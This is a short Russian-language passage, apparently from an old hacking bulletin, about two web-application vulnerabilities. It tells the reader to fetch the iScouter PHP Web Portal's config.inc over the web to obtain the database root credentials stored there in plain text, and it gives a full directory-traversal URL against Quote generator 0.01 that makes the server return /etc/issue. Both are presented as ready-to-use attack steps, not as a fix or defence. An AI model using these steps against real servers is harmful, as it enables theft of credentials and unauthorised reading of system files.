В iScouter PHP Web Portal System в
открытом виде хранятся административные
пароли к базам данных в открытом тексте.
Надо найти файл http://www.server.cim/config.inc и
посмотреть в нем строчки:
$CFG_DB_SERVERTYPE = "mySQL";
$CFG_DB_HOST = "www.your-iScouter-web-portal.com";
$CFG_DB_USERNAME = "root";
$CFG_DB_PASSWORD = "xxxxxxxxx";
$CFG_DB_NAME = "iscouter";
Quote generator 0.01 неправильно
обрабатывает ../..
Спросим строчку такую:
http://www.yourhost.com/quote.html?filename=../..
/../../../../../../../../../../../ ../../../etc/issue& path_to_font_file=ariali.ttf
и сервер отдаст файл /etc/issue.
